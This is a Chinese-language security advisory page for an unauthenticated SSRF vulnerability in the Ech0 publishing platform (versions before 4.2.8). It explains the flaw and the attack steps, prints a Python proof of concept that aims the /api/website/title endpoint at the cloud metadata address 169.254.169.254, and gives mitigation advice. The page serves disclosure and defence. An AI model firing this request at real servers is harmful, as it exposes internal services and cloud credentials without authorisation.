CVE-2026-35037 CVSS 7.2 高危

CVE-2026-35037：Ech0平台存在SSRF漏洞

披露日期: 2026-04-06

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-35037

漏洞类型

SSRF (服务器端请求伪造)

CVSS评分

7.2 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Ech0

漏洞概述

Ech0是一个开源的自托管发布平台。在4.2.8版本之前，其`/api/website/title`接口存在服务器端请求伪造（SSRF）漏洞。该接口未对`website_url`参数进行有效的校验，且无需认证即可访问。攻击者可利用此漏洞构造恶意请求，使服务器向内部网络、云元数据端点（如169.254.169.254）或本地服务发起请求，并通过响应中的HTML title标签窃取敏感信息。

技术细节

该漏洞源于Ech0平台在处理`/api/website/title`接口请求时，未对用户输入的`website_url`参数进行严格的来源校验。应用程序直接将该参数作为目标地址发起服务器端HTTP请求，并提取返回HTML中的`<title>`标签内容作为响应。由于该接口缺乏身份验证机制，任何攻击者均可访问。攻击者可利用此特性，通过修改`website_url`参数指向内网敏感地址（如`http://127.0.0.1:8080`）或云服务商元数据服务（`http://169.254.169.254`）。虽然只能获取Title内容，但在特定场景下仍可泄露敏感信息，甚至结合其他漏洞进行进一步攻击。

攻击链分析

STEP 1

侦察

攻击者发现目标运行的是Ech0平台，且版本低于4.2.8。

STEP 2

利用

攻击者向`/api/website/title`端点发送GET请求，并在`website_url`参数中填入内网地址或云元数据地址（如169.254.169.254）。

STEP 3

数据窃取

服务器端解析请求并向目标地址发起HTTP请求，获取HTML页面的Title标签内容并返回给攻击者。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

def check_ssrf(target_host):
    """
    Exploit CVE-2026-35037: Ech0 SSRF via /api/website/title
    """
    # Vulnerable endpoint
    endpoint = "/api/website/title"
    
    # Target internal service (e.g., AWS Metadata)
    # Note: In a real test, replace with a controlled internal domain
    payload_url = "http://169.254.169.254/latest/meta-data/ami-id"
    
    full_url = f"http://{target_host}{endpoint}?website_url={payload_url}"
    
    try:
        response = requests.get(full_url, timeout=5)
        if response.status_code == 200:
            print(f"[+] Request sent to: {full_url}")
            print(f"[+] Response Status: {response.status_code}")
            print(f"[+] Response Body: {response.text}")
            if "ami-" in response.text or response.text != "":
                print("[!] Potential SSRF vulnerability confirmed!")
        else:
            print(f"[-] Unexpected status code: {response.status_code}")
    except Exception as e:
        print(f"[-] Error occurred: {e}")

if __name__ == "__main__":
    target = "example.com" # Replace with actual target
    check_ssrf(target)

影响范围

Ech0 < 4.2.8

防御指南

临时缓解措施

若无法立即升级，建议临时禁用`/api/website/title`接口功能，或在网络网关处配置规则，拦截对`169.254.169.254`及`127.0.0.0/8`等敏感地址段的出站连接请求。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表